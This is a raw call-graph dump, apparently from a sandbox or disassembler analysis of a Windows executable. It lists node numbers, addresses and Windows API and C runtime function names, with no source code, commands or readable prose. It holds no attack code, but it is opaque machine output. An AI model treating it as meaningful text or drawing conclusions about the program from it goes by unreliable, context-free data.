__getptd_noexit 84697->84703 84699 41f6b1 HeapAlloc 84701 41f6d8 84699->84701 84699->84702 84700 41f694 84700->84689 84701->84689 84702->84699 84702->84701 84703->84700 84707 416b0d 84704->84707 84705 4135bb _malloc 45 API calls 84705->84707 84706 416b43 84706->84630 84707->84705 84707->84706 84708 416b24 Sleep 84707->84708 84709 416b39 84708->84709 84709->84706 84709->84707 84710->84641 84712 41377c __dosmaperr 84711->84712 84713 413753 RtlFreeHeap 84711->84713 84712->84639 84713->84712 84714 413768 84713->84714 84720 417f77 46 API calls __getptd_noexit 84714->84720 84716 41376e GetLastError 84716->84712 84721 417daa 84717->84721 84720->84716 84722 417dc9 _memcpy_s __call_reportfault 84721->84722 84723 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84722->84723 84726 417eb5 __call_reportfault 84723->84726 84725 417ed1 GetCurrentProcess TerminateProcess 84725->84649 84727 41a208 84726->84727 84728 41a210 84727->84728 84729 41a212 IsDebuggerPresent 84727->84729 84728->84725 84735 41fe19 84729->84735 84732 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84733 421ff0 __call_reportfault 84732->84733 84734 421ff8 GetCurrentProcess TerminateProcess 84732->84734 84733->84734 84734->84725 84735->84732 84736->84653 84738 408f48 moneypunct 84737->84738 84739 4265c7 VariantClear 84738->84739 84740 408f55 moneypunct 84738->84740 84739->84740 84740->84658 84797 40ebd0 84741->84797 84801 4182cb 84744->84801 84746 41195e 84808 4181f2 LeaveCriticalSection 84746->84808 84748 40d748 84749 4119b0 84748->84749 84750 4119d6 84749->84750 84751 4119bc 84749->84751 84750->84666 84751->84750 84843 417f77 46 API calls __getptd_noexit 84751->84843 84753 4119c6 84844 417f25 10 API calls __wcsnicmp 84753->84844 84755 4119d1 84755->84666 84756->84668 84845 401f20 84757->84845 84759 40d5b6 IsDebuggerPresent 84760 40d5c4 84759->84760 84761 42e1bb MessageBoxA 84759->84761 84762 40d5e3 84760->84762 84763 42e1d4 84760->84763 84761->84763 84915 40f520 84762->84915 85017 403a50 52 API calls 3 library calls 84763->85017 84767 40d5fd GetFullPathNameW 84927 401460 84767->84927 84769 40d63b 84770 40d643 84769->84770 84772 42e231 SetCurrentDirectoryW 84769->84772 84771 40d64c 84770->84771 85018 432fee 6 API calls 84770->85018 84942 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84771->84942 84772->84770 84775 42e252 84775->84771 84777 42e25a GetModuleFileNameW 84775->84777 84779 42e274 84777->84779 84780 42e2cb GetForegroundWindow ShellExecuteW 84777->84780 85019 401b10 84779->85019 84784 40d688 84780->84784 84781 40d656 84783 40d669 84781->84783 84786 40e0c0 74 API calls 84781->84786 84950 4091e0 84783->84950 84788 40d692 SetCurrentDirectoryW 84784->84788 84786->84783 84788->84670 84791 42e28d 85026 40d200 52 API calls 2 library calls 84791->85026 84794 42e299 GetForegroundWindow ShellExecuteW 84795 42e2c6 84794->84795 84795->84784 84796 40ec00 LoadLibraryA GetProcAddress 84796->84661 84798 40d72e 84797->84798 84799 40ebd6 LoadLibraryA 84797->84799 84798->84661 84798->84796 84799->84798 84800 40ebe7 GetProcAddress 84799->84800 84800->84798 84802 4182e0 84801->84802 84803 4182f3 EnterCriticalSection 84801->84803 84809 418209 84802->84809 84803->84746 84805 4182e6 84805->84803 84836 411924 46 API calls 3 library calls 84805->84836 84808->84748 84810 418215 __close 84809->84810 84811 418225 84810->84811 84812 41823d 84810->84812 84837 418901 46 API calls __NMSG_WRITE 84811->84837 84814 41824b __close 84812->84814 84815 416b04 __malloc_crt 45 API calls 84812->84815 84814->84805 84817 418256 84815->84817 84816 41822a 84838 418752 46 API calls 8 library calls 84816->84838 84819 41825d 84817->84819 84820 41826c 84817->84820 84840 417f77 46 API calls __getptd_noexit 84819->84840 84823 4182cb __lock 45 API calls 84820->84823 84821 418231 84839 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84821->84839 84825 418273 84823->84825 84827 4182a6 84825->84827 84828 41827b InitializeCriticalSectionAndSpinCount 84825->84828 84829 413748 _free 45 API calls 84827->84829 84830 418297 84828->84830 84831 41828b 84828->84831 84829->84830 84842 4182c2 LeaveCriticalSection _doexit 84830->84842 84832 413748 _free 45 API calls 84831->84832 84834 418291 84832->84834 84841 417f77 46 API calls __getptd_noexit 84834->84841 84837->84816 84838->84821 84840->84814 84841->84830 84842->84814 84843->84753 84844->84755 85027 40e6e0 84845->85027 84849 401f41 GetModuleFileNameW 85045 410100 84849->85045 84851 401f5c 85057 410960 84851->85057 84854 401b10 52 API calls 84855 401f81 84854->84855 85060 401980 84855->85060 84857 401f8e 84858 408f40 VariantClear 84857->84858 84859 401f9d 84858->84859 84860 401b10 52 API calls 84859->84860 84861 401fb4 84860->84861 84862 401980 53 API calls 84861->84862 84863 401fc3 84862->84863 84864 401b10 52 API calls 84863->84864 84865 401fd2 84864->84865 85068 40c2c0 84865->85068 84867 401fe1 84868 40bc70 52 API calls 84867->84868 84869 401ff3 84868->84869 85086 401a10 84869->85086 84871 401ffe 85093 4114ab 84871->85093 84874 428b05 84876 401a10 52 API calls 84874->84876 84875 402017 84877 4114ab __wcsicoll 58 API calls 84875->84877 84878 428b18 84876->84878 84879 402022 84877->84879 84881 401a10 52 API calls 84878->84881 84879->84878 84880 40202d 84879->84880 84882 4114ab __wcsicoll 58 API calls 84880->84882 84883 428b33 84881->84883 84884 402038 84882->84884 84886 428b3b GetModuleFileNameW 84883->84886 84885 402043 84884->84885 84884->84886 84888 4114ab __wcsicoll 58 API calls 84885->84888 84887 401a10 52 API calls 84886->84887 84890 428b6c 84887->84890 84889 40204e 84888->84889 84891 402092 84889->84891 84895 401a10 52 API calls 84889->84895 84900 428b90 _wcscpy 84889->84900 84892 40e0a0 52 API calls 84890->84892 84894 4020a3 84891->84894 84891->84900 84893 428b7a 84892->84893 84896 401a10 52 API calls 84893->84896 84897 428bc6 84894->84897 85101 40e830 53 API calls 84894->85101 84898 402073 _wcscpy 84895->84898 84899 428b88 84896->84899 84905 401a10 52 API calls 84898->84905 84899->84900 84902 401a10 52 API calls 84900->84902 84910 4020d0 84902->84910 84903 4020bb 85102 40cf00 53 API calls 84903->85102 84905->84891 84906 4020c6 84907 408f40 VariantClear 84906->84907 84907->84910 84908 402110 84912 408f40 VariantClear 84908->84912 84910->84908 84913 401a10 52 API calls 84910->84913 85103 40cf00 53 API calls 84910->85103 85104 40e6a0 53 API calls 84910->85104 84914 402120 moneypunct 84912->84914 84913->84910 84914->84759 84916 4295c9 _memcpy_s 84915->84916 84917 40f53c 84915->84917 84920 4295d9 GetOpenFileNameW 84916->84920 85780 410120 84917->85780 84919 40f545 85784 4102b0 SHGetMalloc 84919->85784 84920->84917 84923 40d5f5 84920->84923 84922 40f54c 85789 410190 GetFullPathNameW 84922->85789 84923->84767 84923->84769 84925 40f559 85800 40f570 84925->85800 85862 402400 84927->85862 84929 40146f 84933 428c29 _wcscat 84929->84933 85871 401500 84929->85871 84931 40147c 84931->84933 85879 40d440 84931->85879 84934 401489 84934->84933 84935 401491 GetFullPathNameW 84934->84935 84936 402160 52 API calls 84935->84936 84937 4014bb 84936->84937 84938 402160 52 API calls 84937->84938 84939 4014c8 84938->84939 84939->84933 84940 402160 52 API calls 84939->84940 84941 4014ee 84940->84941 84941->84769 84943 428361 84942->84943 84944 4103fc LoadImageW RegisterClassExW 84942->84944 85899 44395e EnumResourceNamesW LoadImageW 84943->85899 85898 410490 7 API calls 84944->85898 84947 40d651 84949 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84947->84949 84948 428368 84949->84781 84951 42d7ad 84950->84951 84953 409202 84950->84953 86174 45e737 90 API calls 3 library calls 84951->86174 85011 409216 moneypunct 84953->85011 86171 410940 331 API calls 84953->86171 84955 409386 84956 40939c 84955->84956 86172 40f190 10 API calls 84955->86172 84956->84784 85016 401000 Shell_NotifyIconW _memcpy_s 84956->85016 84958 4095b2 84958->84956 84959 4095bf 84958->84959 86173 401a50 331 API calls 84959->86173 84960 409253 PeekMessageW 84960->85011 84962 42d8cd Sleep 84962->85011 84963 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84963->84956 84966 4095f9 84963->84966 84965 42e13b 86192 40d410 VariantClear 84965->86192 84968 42e158 TranslateMessage DispatchMessageW GetMessageW 84966->84968 84968->84968 84971 42e188 84968->84971 84970 409567 PeekMessageW 84970->85011 84971->84956 84974 46fdbf 108 API calls 85015 4094e0 84974->85015 84975 46f3c1 107 API calls 84975->85011 84976 40e0a0 52 API calls 84976->85011 84977 409551 TranslateMessage DispatchMessageW 84977->84970 84979 42dcd2 WaitForSingleObject 84980 42dcf0 GetExitCodeProcess CloseHandle 84979->84980 84979->85011 86181 40d410 VariantClear 84980->86181 84982 44c29d 52 API calls 84982->85015 84983 42dd3d Sleep 84983->85015 84984 47d33e 309 API calls 84984->85011 84987 4094cf Sleep 84987->85015 84989 42d94d timeGetTime 86177 465124 53 API calls 84989->86177 84991 40d410 VariantClear 84991->85011 84992 40c620 timeGetTime 84992->85015 84995 42dd89 CloseHandle 84995->85015 84996 408f40 VariantClear 84996->85015 84998 465124 53 API calls 84998->85015 84999 42de19 GetExitCodeProcess CloseHandle 84999->85015 85001 401b10 52 API calls 85001->85015 85004 42de88 Sleep 85004->85011 85006 401980 53 API calls 85006->85015 85007 45e737 90 API calls 85007->85011 85010 42e0cc VariantClear 85010->85011 85011->84955 85011->84960 85011->84962 85011->84965 85011->84970 85011->84975 85011->84976 85011->84977 85011->84979 85011->84983 85011->84984 85011->84987 85011->84989 85011->84991 85011->85007 85011->85010 85012 408f40 VariantClear 85011->85012 85011->85015 85900 4091b0 85011->85900 85958 40afa0 85011->85958 85984 408fc0 85011->85984 86019 408cc0 85011->86019 86033 40d150 85011->86033 86038 40d170 85011->86038 86044 4096a0 85011->86044 86175 465124 53 API calls 85011->86175 86176 40c620 timeGetTime 85011->86176 86191 40e270 VariantClear moneypunct 85011->86191 85012->85011 85015->84974 85015->84982 85015->84992 85015->84995 85015->84996 85015->84998 85015->84999 85015->85001 85015->85004 85015->85006 85015->85011 86178 45178a 54 API calls 85015->86178 86179 47d33e 331 API calls 85015->86179 86180 453bc6 54 API calls 85015->86180 86182 40d410 VariantClear 85015->86182 86183 443d19 67 API calls _wcslen 85015->86183 86184 4574b4 VariantClear 85015->86184 86185 403cd0 85015->86185 86189 4731e1 VariantClear 85015->86189 86190 4331a2 6 API calls 85015->86190 85016->84784 85017->84769 85018->84775 85020 401b16 _wcslen 85019->85020 85021 4115d7 52 API calls 85020->85021 85024 401b63 85020->85024 85022 401b4b _memmove 85021->85022 85023 4115d7 52 API calls 85022->85023 85023->85024 85025 40d200 52 API calls 2 library calls 85024->85025 85025->84791 85026->84794 85028 40bc70 52 API calls 85027->85028 85029 401f31 85028->85029 85030 402560 85029->85030 85031 40256d __write_nolock 85030->85031 85032 402160 52 API calls 85031->85032 85034 402593 85032->85034 85044 4025bd 85034->85044 85105 401c90 85034->85105 85035 4026f0 52 API calls 85035->85044 85036 4026a7 85037 401b10 52 API calls 85036->85037 85043 4026db 85036->85043 85039 4026d1 85037->85039 85038 401b10 52 API calls 85038->85044 85109 40d7c0 52 API calls 2 library calls 85039->85109 85041 401c90 52 API calls 85041->85044 85043->84849 85044->85035 85044->85036 85044->85038 85044->85041 85108 40d7c0 52 API calls 2 library calls 85044->85108 85110 40f760 85045->85110 85048 410118 85048->84851 85050 42805d 85051 42806a 85050->85051 85166 431e58 85050->85166 85053 413748 _free 46 API calls 85051->85053 85054 428078 85053->85054 85055 431e58 82 API calls 85054->85055 85056 428084 85055->85056 85056->84851 85058 4115d7 52 API calls 85057->85058 85059 401f74 85058->85059 85059->84854 85061 4019a3 85060->85061 85062 401985 85060->85062 85061->85062 85063 4019b8 85061->85063 85065 40199f 85062->85065 85768 403e10 53 API calls 85062->85768 85769 403e10 53 API calls 85063->85769 85065->84857 85067 4019c4 85067->84857 85069 40c2c7 85068->85069 85070 40c30e 85068->85070 85073 40c2d3 85069->85073 85074 426c79 85069->85074 85071 40c315 85070->85071 85072 426c2b 85070->85072 85075 40c321 85071->85075 85076 426c5a 85071->85076 85078 426c4b 85072->85078 85079 426c2e 85072->85079 85770 403ea0 52 API calls __cinit 85073->85770 85775 4534e3 52 API calls 85074->85775 85771 403ea0 52 API calls __cinit 85075->85771 85774 4534e3 52 API calls 85076->85774 85773 4534e3 52 API calls 85078->85773 85085 40c2de 85079->85085 85772 4534e3 52 API calls 85079->85772 85085->84867 85087 401a30 85086->85087 85088 401a17 85086->85088 85090 402160 52 API calls 85087->85090 85089 401a2d 85088->85089 85776 403c30 52 API calls _memmove 85088->85776 85089->84871 85092 401a3d 85090->85092 85092->84871 85094 411523 85093->85094 85095 4114ba 85093->85095 85779 4113a8 58 API calls 3 library calls 85094->85779 85099 40200c 85095->85099 85777 417f77 46 API calls __getptd_noexit 85095->85777 85098 4114c6 85778 417f25 10 API calls __wcsnicmp 85098->85778 85099->84874 85099->84875 85101->84903 85102->84906 85103->84910 85104->84910 85106 4026f0 52 API calls 85105->85106 85107 401c97 85106->85107 85107->85034 85108->85044 85109->85043 85170 40f6f0 85110->85170 85112 40f77b _strcat moneypunct 85178 40f850 85112->85178 85117 427c2a 85207 414d04 85117->85207 85119 40f7fc 85119->85117 85120 40f804 85119->85120 85194 414a46 85120->85194 85124 40f80e 85124->85048 85129 4528bd 85124->85129 85126 427c59 85213 414fe2 85126->85213 85128 427c79 85130 4150d1 _fseek 81 API calls 85129->85130 85131 452930 85130->85131 85710 452719 85131->85710 85134 452948 85134->85050 85135 414d04 __fread_nolock 61 API calls 85136 452966 85135->85136 85137 414d04 __fread_nolock 61 API calls 85136->85137 85138 452976 85137->85138 85139 414d04 __fread_nolock 61 API calls 85138->85139 85140 45298f 85139->85140 85141 414d04 __fread_nolock 61 API calls 85140->85141 85142 4529aa 85141->85142 85143 4150d1 _fseek 81 API calls 85142->85143 85144 4529c4 85143->85144 85145 4135bb _malloc 46 API calls 85144->85145 85146 4529cf 85145->85146 85147 4135bb _malloc 46 API calls 85146->85147 85148 4529db 85147->85148 85149 414d04 __fread_nolock 61 API calls 85148->85149 85150 4529ec 85149->85150 85151 44afef GetSystemTimeAsFileTime 85150->85151 85152 452a00 85151->85152 85153 452a36 85152->85153 85154 452a13 85152->85154 85155 452aa5 85153->85155 85156 452a3c 85153->85156 85157 413748 _free 46 API calls 85154->85157 85160 413748 _free 46 API calls 85155->85160 85716 44b1a9 85156->85716 85158 452a1c 85157->85158 85161 413748 _free 46 API calls 85158->85161 85163 452aa3 85160->85163 85164 452a25 85161->85164 85162 452a9d 85165 413748 _free 46 API calls 85162->85165 85163->85050 85164->85050 85165->85163 85167 431e64 85166->85167 85168 431e6a 85166->85168 85169 414a46 __fcloseall 82 API calls 85167->85169 85168->85051 85169->85168 85171 425de2 85170->85171 85174 40f6fc _wcslen 85170->85174 85171->85112 85172 40f710 WideCharToMultiByte 85173 40f756 85172->85173 85175 40f728 85172->85175 85173->85112 85174->85172 85176 4115d7 52 API calls 85175->85176 85177 40f735 WideCharToMultiByte 85176->85177 85177->85112 85179 40f85d _memcpy_s _strlen 85178->85179 85181 40f7ab 85179->85181 85226 414db8 85179->85226 85182 4149c2 85181->85182 85238 414904 85182->85238 85184 40f7e9 85184->85117 85185 40f5c0 85184->85185 85189 40f5cd _strcat __write_nolock _memmove 85185->85189 85186 414d04 __fread_nolock 61 API calls 85186->85189 85187 40f691 __tzset_nolock 85187->85119 85189->85186 85189->85187 85191 425d11 85189->85191 85326 4150d1 85189->85326 85190 4150d1 _fseek 81 API calls 85192 425d33 85190->85192 85191->85190 85193 414d04 __fread_nolock 61 API calls 85192->85193 85193->85187 85195 414a52 __close 85194->85195 85196 414a64 85195->85196 85197 414a79 85195->85197 85466 417f77 46 API calls __getptd_noexit 85196->85466 85200 415471 __lock_file 47 API calls 85197->85200 85204 414a74 __close 85197->85204 85199 414a69 85467 417f25 10 API calls __wcsnicmp 85199->85467 85202 414a92 85200->85202 85450 4149d9 85202->85450 85204->85124 85535 414c76 85207->85535 85209 414d1c 85210 44afef 85209->85210 85703 442c5a 85210->85703 85212 44b00d 85212->85126 85214 414fee __close 85213->85214 85215 414ffa 85214->85215 85216 41500f 85214->85216 85707 417f77 46 API calls __getptd_noexit 85215->85707 85218 415471 __lock_file 47 API calls 85216->85218 85220 415017 85218->85220 85219 414fff 85708 417f25 10 API calls __wcsnicmp 85219->85708 85222 414e4e __ftell_nolock 51 API calls 85220->85222 85223 415024 85222->85223 85709 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85223->85709 85225 41500a __close 85225->85128 85227 414dd6 85226->85227 85228 414deb 85226->85228 85235 417f77 46 API calls __getptd_noexit 85227->85235 85228->85227 85233 414df2 85228->85233 85230 414ddb 85236 417f25 10 API calls __wcsnicmp 85230->85236 85232 414de6 85232->85179 85233->85232 85237 418f98 77 API calls 7 library calls 85233->85237 85235->85230 85236->85232 85237->85232 85241 414910 __close 85238->85241 85239 414923 85294 417f77 46 API calls __getptd_noexit 85239->85294 85241->85239 85243 414951 85241->85243 85242 414928 85295 417f25 10 API calls __wcsnicmp 85242->85295 85257 41d4d1 85243->85257 85246 414956 85247 41496a 85246->85247 85248 41495d 85246->85248 85249 414992 85247->85249 85250 414972 85247->85250 85296 417f77 46 API calls __getptd_noexit 85248->85296 85274 41d218 85249->85274 85297 417f77 46 API calls __getptd_noexit 85250->85297 85256 414933 __close @_EH4_CallFilterFunc@8 85256->85184 85258 41d4dd __close 85257->85258 85259 4182cb __lock 46 API calls 85258->85259 85272 41d4eb 85259->85272 85260 41d560 85299 41d5fb 85260->85299 85261 41d567 85262 416b04 __malloc_crt 46 API calls 85261->85262 85264 41d56e 85262->85264 85264->85260 85266 41d57c InitializeCriticalSectionAndSpinCount 85264->85266 85265 41d5f0 __close 85265->85246 85267 41d59c 85266->85267 85268 41d5af EnterCriticalSection 85266->85268 85271 413748 _free 46 API calls 85267->85271 85268->85260 85269 418209 __mtinitlocknum 46 API calls 85269->85272 85271->85260 85272->85260 85272->85261 85272->85269 85302 4154b2 47 API calls __lock 85272->85302 85303 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85272->85303 85275 41d23a 85274->85275 85276 41d255 85275->85276 85288 41d26c __wopenfile 85275->85288 85308 417f77 46 API calls __getptd_noexit 85276->85308 85278 41d421 85281 41d47a 85278->85281 85282 41d48c 85278->85282 85279 41d25a 85309 417f25 10 API calls __wcsnicmp 85279->85309 85313 417f77 46 API calls __getptd_noexit 85281->85313 85305 422bf9 85282->85305 85285 41499d 85298 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85285->85298 85286 41d47f 85314 417f25 10 API calls __wcsnicmp 85286->85314 85288->85278 85288->85281 85288->85288 85310 41341f 58 API calls 2 library calls 85288->85310 85290 41d41a 85290->85278 85311 41341f 58 API calls 2 library calls 85290->85311 85292 41d439 85292->85278 85312 41341f 58 API calls 2 library calls 85292->85312 85294->85242 85295->85256 85296->85256 85297->85256 85298->85256 85304 4181f2 LeaveCriticalSection 85299->85304 85301 41d602 85301->85265 85302->85272 85303->85272 85304->85301 85315 422b35 85305->85315 85307 422c14 85307->85285 85308->85279 85309->85285 85310->85290 85311->85292 85312->85278 85313->85286 85314->85285 85317 422b41 __close 85315->85317 85316 422b54 85318 417f77 __wcsnicmp 46 API calls 85316->85318 85317->85316 85319 422b8a 85317->85319 85320 422b59 85318->85320 85321 422400 __tsopen_nolock 109 API calls 85319->85321 85322 417f25 __wcsnicmp 10 API calls 85320->85322 85323 422ba4 85321->85323 85325 422b63 __close 85322->85325 85324 422bcb __wsopen_helper LeaveCriticalSection 85323->85324 85324->85325 85325->85307 85327 4150dd __close 85326->85327 85328 4150e9 85327->85328 85330 41510f 85327->85330 85357 417f77 46 API calls __getptd_noexit 85328->85357 85339 415471 85330->85339 85331 4150ee 85358 417f25 10 API calls __wcsnicmp 85331->85358 85338 4150f9 __close 85338->85189 85340 415483 85339->85340 85341 4154a5 EnterCriticalSection 85339->85341 85340->85341 85343 41548b 85340->85343 85342 415117 85341->85342 85345 415047 85342->85345 85344 4182cb __lock 46 API calls 85343->85344 85344->85342 85346 415067 85345->85346 85347 415057 85345->85347 85352 415079 85346->85352 85360 414e4e 85346->85360 85415 417f77 46 API calls __getptd_noexit 85347->85415 85351 41505c 85359 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85351->85359 85377 41443c 85352->85377 85355 4150b9 85390 41e1f4 85355->85390 85357->85331 85358->85338 85359->85338 85361 414e61 85360->85361 85362 414e79 85360->85362 85416 417f77 46 API calls __getptd_noexit 85361->85416 85364 414139 __fclose_nolock 46 API calls 85362->85364 85366 414e80 85364->85366 85365 414e66 85417 417f25 10 API calls __wcsnicmp 85365->85417 85368 41e1f4 __write 51 API calls 85366->85368 85369 414e97 85368->85369 85370 414f09 85369->85370 85372 414ec9 85369->85372 85376 414e71 85369->85376 85418 417f77 46 API calls __getptd_noexit 85370->85418 85373 41e1f4 __write 51 API calls 85372->85373 85372->85376 85374 414f64 85373->85374 85375 41e1f4 __write 51 API calls 85374->85375 85374->85376 85375->85376 85376->85352 85378 414455 85377->85378 85379 414477 85377->85379 85378->85379 85380 414139 __fclose_nolock 46 API calls 85378->85380 85383 414139 85379->85383 85381 414470 85380->85381 85419 41b7b2 77 API calls 5 library calls 85381->85419 85384 414145 85383->85384 85385 41415a 85383->85385 85420 417f77 46 API calls __getptd_noexit 85384->85420 85385->85355 85387 41414a 85421 417f25 10 API calls __wcsnicmp 85387->85421 85389 414155 85389->85355 85391 41e200 __close 85390->85391 85392 41e223 85391->85392 85393 41e208 85391->85393 85395 41e22f 85392->85395 85400 41e269 85392->85400 85442 417f8a 46 API calls __getptd_noexit 85393->85442 85444 417f8a 46 API calls __getptd_noexit 85395->85444 85396 41e20d 85443 417f77 46 API calls __getptd_noexit 85396->85443 85399 41e234 85445 417f77 46 API calls __getptd_noexit 85399->85445 85422 41ae56 85400->85422 85403 41e26f 85405 41e291 85403->85405 85406 41e27d 85403->85406 85404 41e23c 85446 417f25 10 API calls __wcsnicmp 85404->85446 85447 417f77 46 API calls __getptd_noexit 85405->85447 85432 41e17f 85406->85432 85410 41e215 __close 85410->85351 85411 41e289 85449 41e2c0 LeaveCriticalSection __unlock_fhandle 85411->85449 85412 41e296 85448 417f8a 46 API calls __getptd_noexit 85412->85448 85415->85351 85416->85365 85417->85376 85418->85376 85419->85379 85420->85387 85421->85389 85423 41ae62 __close 85422->85423 85424 41aebc 85423->85424 85425 4182cb __lock 46 API calls 85423->85425 85426 41aec1 EnterCriticalSection 85424->85426 85427 41aede __close 85424->85427 85428 41ae8e 85425->85428 85426->85427 85427->85403 85429 41aeaa 85428->85429 85430 41ae97 InitializeCriticalSectionAndSpinCount 85428->85430 85431 41aeec ___lock_fhandle LeaveCriticalSection 85429->85431 85430->85429 85431->85424 85433 41aded __commit 46 API calls 85432->85433 85434 41e18e 85433->85434 85435 41e1a4 SetFilePointer 85434->85435 85436 41e194 85434->85436 85438 41e1c3 85435->85438 85439 41e1bb GetLastError 85435->85439 85437 417f77 __wcsnicmp 46 API calls 85436->85437 85441 41e199 85437->85441 85440 417f9d __dosmaperr 46 API calls 85438->85440 85438->85441 85439->85438 85440->85441 85441->85411 85442->85396 85443->85410 85444->85399 85445->85404 85446->85410 85447->85412 85448->85411 85449->85410 85451 4149ea 85450->85451 85452 4149fe 85450->85452 85496 417f77 46 API calls __getptd_noexit 85451->85496 85454 4149fa 85452->85454 85456 41443c __flush 77 API calls 85452->85456 85468 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85454->85468 85455 4149ef 85497 417f25 10 API calls __wcsnicmp 85455->85497 85457 414a0a 85456->85457 85469 41d8c2 85457->85469 85461 414139 __fclose_nolock 46 API calls 85462 414a18 85461->85462 85473 41d7fe 85462->85473 85464 414a1e 85464->85454 85465 413748 _free 46 API calls 85464->85465 85465->85454 85466->85199 85467->85204 85468->85204 85470 414a12 85469->85470 85471 41d8d2 85469->85471 85470->85461 85471->85470 85472 413748 _free 46 API calls 85471->85472 85472->85470 85474 41d80a __close 85473->85474 85475 41d812 85474->85475 85476 41d82d 85474->85476 85513 417f8a 46 API calls __getptd_noexit 85475->85513 85478 41d839 85476->85478 85481 41d873 85476->85481 85515 417f8a 46 API calls __getptd_noexit 85478->85515 85479 41d817 85514 417f77 46 API calls __getptd_noexit 85479->85514 85484 41ae56 ___lock_fhandle 48 API calls 85481->85484 85483 41d83e 85516 417f77 46 API calls __getptd_noexit 85483->85516 85487 41d879 85484->85487 85486 41d846 85517 417f25 10 API calls __wcsnicmp 85486->85517 85489 41d893 85487->85489 85490 41d887 85487->85490 85518 417f77 46 API calls __getptd_noexit 85489->85518 85498 41d762 85490->85498 85491 41d81f __close 85491->85464 85494 41d88d 85519 41d8ba LeaveCriticalSection __unlock_fhandle 85494->85519 85496->85455 85497->85454 85520 41aded 85498->85520 85500 41d7c8 85533 41ad67 47 API calls 2 library calls 85500->85533 85502 41d772 85502->85500 85503 41d7a6 85502->85503 85506 41aded __commit 46 API calls 85502->85506 85503->85500 85504 41aded __commit 46 API calls 85503->85504 85507 41d7b2 CloseHandle 85504->85507 85505 41d7d0 85508 41d7f2 85505->85508 85534 417f9d 46 API calls 3 library calls 85505->85534 85509 41d79d 85506->85509 85507->85500 85510 41d7be GetLastError 85507->85510 85508->85494 85512 41aded __commit 46 API calls 85509->85512 85510->85500 85512->85503 85513->85479 85514->85491 85515->85483 85516->85486 85517->85491 85518->85494 85519->85491 85521 41adfa 85520->85521 85522 41ae12 85520->85522 85523 417f8a __close 46 API calls 85521->85523 85524 417f8a __close 46 API calls 85522->85524 85528 41ae51 85522->85528 85525 41adff 85523->85525 85527 41ae23 85524->85527 85526 417f77 __wcsnicmp 46 API calls 85525->85526 85529 41ae07 85526->85529 85530 417f77 __wcsnicmp 46 API calls 85527->85530 85528->85502 85529->85502 85531 41ae2b 85530->85531 85532 417f25 __wcsnicmp 10 API calls 85531->85532 85532->85529 85533->85505 85534->85508 85536 414c82 __close 85535->85536 85537 414cc3 85536->85537 85538 414c96 _memcpy_s 85536->85538 85539 414cbb __close 85536->85539 85540 415471 __lock_file 47 API calls 85537->85540 85562 417f77 46 API calls __getptd_noexit 85538->85562 85539->85209 85542 414ccb 85540->85542 85548 414aba 85542->85548 85543 414cb0 85563 417f25 10 API calls __wcsnicmp 85543->85563 85552 414ad8 _memcpy_s 85548->85552 85554 414af2 85548->85554 85549 414ae2 85615 417f77 46 API calls __getptd_noexit 85549->85615 85551 414ae7 85616 417f25 10 API calls __wcsnicmp 85551->85616 85552->85549 85552->85554 85559 414b2d 85552->85559 85564 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85554->85564 85556 414c38 _memcpy_s 85618 417f77 46 API calls __getptd_noexit 85556->85618 85557 414139 __fclose_nolock 46 API calls 85557->85559 85559->85554 85559->85556 85559->85557 85565 41dfcc 85559->85565 85595 41d8f3 85559->85595 85617 41e0c2 46 API calls 3 library calls 85559->85617 85562->85543 85563->85539 85564->85539 85566 41dfd8 __close 85565->85566 85567 41dfe0 85566->85567 85568 41dffb 85566->85568 85688 417f8a 46 API calls __getptd_noexit 85567->85688 85570 41e007 85568->85570 85574 41e041 85568->85574 85690 417f8a 46 API calls __getptd_noexit 85570->85690 85571 41dfe5 85689 417f77 46 API calls __getptd_noexit 85571->85689 85573 41e00c 85691 417f77 46 API calls __getptd_noexit 85573->85691 85577 41e063 85574->85577 85578 41e04e 85574->85578 85581 41ae56 ___lock_fhandle 48 API calls 85577->85581 85693 417f8a 46 API calls __getptd_noexit 85578->85693 85579 41dfed __close 85579->85559 85583 41e069 85581->85583 85582 41e053 85694 417f77 46 API calls __getptd_noexit 85582->85694 85584 41e077 85583->85584 85585 41e08b 85583->85585 85619 41da15 85584->85619 85695 417f77 46 API calls __getptd_noexit 85585->85695 85590 41e014 85692 417f25 10 API calls __wcsnicmp 85590->85692 85591 41e083 85697 41e0ba LeaveCriticalSection __unlock_fhandle 85591->85697 85592 41e090 85696 417f8a 46 API calls __getptd_noexit 85592->85696 85596 41d900 85595->85596 85600 41d915 85595->85600 85701 417f77 46 API calls __getptd_noexit 85596->85701 85598 41d905 85702 417f25 10 API calls __wcsnicmp 85598->85702 85601 41d94a 85600->85601 85606 41d910 85600->85606 85698 420603 85600->85698 85603 414139 __fclose_nolock 46 API calls 85601->85603 85604 41d95e 85603->85604 85605 41dfcc __read 59 API calls 85604->85605 85607 41d965 85605->85607 85606->85559 85607->85606 85608 414139 __fclose_nolock 46 API calls 85607->85608 85609 41d988 85608->85609 85609->85606 85610 414139 __fclose_nolock 46 API calls 85609->85610 85611 41d994 85610->85611 85611->85606 85612 414139 __fclose_nolock 46 API calls 85611->85612 85613 41d9a1 85612->85613 85614 414139 __fclose_nolock 46 API calls 85613->85614 85614->85606 85615->85551 85616->85554 85617->85559 85618->85551 85620 41da31 85619->85620 85621 41da4c 85619->85621 85623 417f8a __close 46 API calls 85620->85623 85622 41da5b 85621->85622 85624 41da7a 85621->85624 85625 417f8a __close 46 API calls 85622->85625 85626 41da36 85623->85626 85628 41da98 85624->85628 85639 41daac 85624->85639 85627 41da60 85625->85627 85629 417f77 __wcsnicmp 46 API calls 85626->85629 85631 417f77 __wcsnicmp 46 API calls 85627->85631 85632 417f8a __close 46 API calls 85628->85632 85640 41da3e 85629->85640 85630 41db02 85634 417f8a __close 46 API calls 85630->85634 85633 41da67 85631->85633 85635 41da9d 85632->85635 85636 417f25 __wcsnicmp 10 API calls 85633->85636 85637 41db07 85634->85637 85638 417f77 __wcsnicmp 46 API calls 